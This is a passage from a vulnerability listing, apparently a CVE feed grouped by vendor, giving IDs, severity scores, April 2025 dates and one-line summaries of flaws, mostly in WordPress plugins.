| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2805 | High | 7.3 | — | 2025-04-10 | The ORDER POST plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. |
Vitejs · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32395 | — | — | — | 2025-04-10 | Vite is a frontend tooling framework for javascript. |
Vivotek · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3403 | Low | 2.7 | — | 2025-04-08 | A vulnerability was found in Vivotek NVR ND8422P, NVR ND9525P and NVR ND9541P 2.4.0.204/3.3.0.104/4.2.0.101. |
Vsourz Digital · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32621 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Vsourz Digital WP Map Route Planner wp-map-route-planner allows Cross Site Request Forgery.This issue affects WP Map Route Planner: from n/a through <= 1.0.0. |
Webinarpress · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32693 | Medium | 4.7 | — | 2025-04-09 | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in WPWebinarSystem WebinarPress wp-webinarsystem allows Phishing.This issue affects WebinarPress: from n/a through <= 1.33.28. |
Webliberty · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31020 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webliberty Simple Spoiler simple-spoiler allows Stored XSS.This issue affects Simple Spoiler: from n/a through <= 1.4. |
Wladyslaw Madejczyk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31404 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Wladyslaw Madejczyk AF Tell a Friend af-tell-a-friend allows Stored XSS.This issue affects AF Tell a Friend: from n/a through <= 1.4. |
Workbox · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32534 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Workbox Workbox Video from Vimeo & Youtube workbox-video-from-vimeo-youtube-plugin allows Reflected XSS.This issue affects Workbox Video… |
Wp Guru · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32681 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Guru Error Log Viewer error-log-viewer-wp allows Blind SQL Injection.This issue affects Error Log Viewer: from n/a through <= 1.0.5. |
Wp Map Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32661 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in WP Map Plugins Interactive US Map interactive-us-map allows Stored XSS.This issue affects Interactive US Map: from n/a through <= 2.7. |
Wp Messiah · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32228 | Medium | 4.3 | — | 2025-04-10 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WP Messiah Ai Image Alt Text Generator for WP ai-image-alt-text-generator-for-wp allows Retrieve Embedded Sensitive Data.This issue affects Ai Imag… |
Wp Shuffle · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32692 | High | 7.5 | — | 2025-04-09 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WP Shuffle WP Subscription Forms wp-subscription-forms allows PHP Local File Inclusion.This issue affects WP Subscript… |
Wp Table Builder · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32598 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Table Builder WP Table Builder wp-table-builder allows Reflected XSS.This issue affects WP Table Builder: from n/a through <= 2.0.5. |
Wpsolr · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31036 | High | 8.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in WPSOLR WPSolr wpsolr-free allows Privilege Escalation.This issue affects WPSolr: from n/a through <= 24.0. |
Wpvsingh · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32240 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in wpvsingh Site Notify site-notify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Site Notify: from n/a through <= 1.0. |
Wpwax · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32499 | Medium | 6.5 | — | 2025-04-09 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in wpWax Logo Showcase Ultimate logo-showcase-ultimate allows PHP Local File Inclusion.This issue affects Logo Showcase U… |
Wpzita · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2575 | Medium | 6.4 | — | 2025-04-11 | The Z Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. |
Xmlsoft · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32414 | Medium | 5.6 | — | 2025-04-08 | In libxml2 before 2.13.8 and 2.14.x before 2.14.2, out-of-bounds memory access can occur in the Python API (Python bindings) because of an incorrect return value. |
Xxyopen · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3369 | Medium | 6.3 | — | 2025-04-07 | A vulnerability was found in xxyopen Novel-Plus 5.1.0. |
Yaycommerce · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3434 | High | 7.2 | — | 2025-04-11 | The SMTP for Amazon SES – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Email Logs in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. |
Ydesignservices · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32617 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Ydesignservices Multiple Location Google Map multiple-location-google-map allows Stored XSS.This issue affects Multiple Location Google Map: from n/a through <= 1.1. |
Zealopensource · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2883 | Medium | 5.3 | — | 2025-04-08 | The Accept SagePay Payments Using Contact Form 7 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0 through the publicly accessible phpinfo.php script. |
Zealousweb · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32679 | Medium | 5.4 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ZealousWeb User Registration Using Contact Form 7 user-registration-using-contact-form-7 allows Cross Site Request Forgery.This issue affects User Registration Using Contact Form 7: from n… |
Zhangyanbo2007 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3381 | Medium | 6.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in zhangyanbo2007 youkefu 4.2.0. |
آریا وردپرس · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32488 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in آریا وردپرس Aria Font aria-font allows Stored XSS.This issue affects Aria Font: from n/a through <= 1.4. |